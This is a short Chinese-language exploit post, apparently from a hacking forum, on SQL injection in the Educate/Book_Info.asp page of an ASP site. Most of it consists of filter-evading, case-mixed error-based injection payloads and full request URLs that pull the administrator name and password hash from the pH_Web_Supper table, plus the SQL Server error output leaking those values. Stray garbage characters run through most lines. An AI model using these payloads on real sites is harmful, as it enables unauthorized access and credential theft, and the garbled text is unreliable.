漏洞出现在Educate/Book_Info.asp
' M; ~+ U: Y$ X' W. I8 e9 B# n " a. x! t5 G0 S+ h4 g
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出+ o J( ]! P8 J1 h. g$ M& o
/ g1 G' T0 @0 ^; v! {: p6 Rexp:如下& g+ h3 ]4 f( \! u4 h2 `
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)$ \; {5 f; {6 s8 `( ^. u" R
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
& s8 E5 X9 a$ k) D/ ^) E8 l % u' z [% ^6 W7 z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 O( o( k, ?. }3 h! c' |$ g
( E; W* X4 D6 S- }8 o( V9 A+ ^Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
( g" w0 {$ o. [. D5 ~
, r: Y" q, _' x P将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。7 x0 x* l" b; }7 s. [, R, K% @
) M, B! I, x9 I' y) H. z' R/Educate/Book_Info.asp,行 8. E% U- i) m- j' D# C' I
8 L$ @" C W/ Bhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 |! A$ y4 p8 j! X: J4 }% { 6 L. `6 ~3 F* ^
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'# L" T5 [- R% x; b# R: t
4 l" B) h& b+ ^. x# x
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
. Z4 r1 S5 M# c$ f2 ~1 z
[4 X* T$ N! C4 \6 V7 T/Educate/Book_Info.asp,行 8 w+ g) P4 L s9 q
|